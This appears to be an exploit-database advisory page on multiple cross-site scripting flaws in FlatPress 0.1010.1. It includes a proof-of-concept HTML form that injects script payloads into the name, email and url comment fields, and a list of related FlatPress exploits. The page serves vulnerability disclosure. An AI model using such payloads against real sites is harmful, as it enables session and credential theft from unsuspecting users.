source: http://www.securityfocus.com/bid/48482/info FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. FlatPress 0.1010.1 is vulnerable; other versions may also be affected. <form action="http://www.example.com/index.php?x=entry:entry110603-123922;comments:1" method="post"> <input type="hidden" name="name" value='"><script>alert(1);</script>'> <input type="hidden" name="email" value='"><script>alert(2);</script>'> <input type="hidden" name="url" value='"><script>alert(3);</script>'> <input name="send" value="EXPLOIT" type="submit"> </form>
Related Exploits
Other Possible E-DB Search Terms: Flatpress 0.1010.1, FlatpressDate | D | V | Title | Author |
---|---|---|---|---|
2009-12-26 |
![]() |
Flatpress - Cross-Site Scripting | indoushka | |
2008-09-25 |
![]() |
Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities | Fabian Fing... | |
2009-09-29 |
![]() |
Flatpress 0.804 < 0.812.1 - Local File Inclusion | Giuseppe Fu... | |
2010-04-03 |
![]() |
Flatpress 0.909.1 - Persistent Cross-Site Scripting | ITSecTeam | |
2013-11-08 |
![]() |
Flatpress 1.0 - Remote Code Execution | Wireghoul | |
2016-05-31 |
![]() |
Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload | LiquidWorm |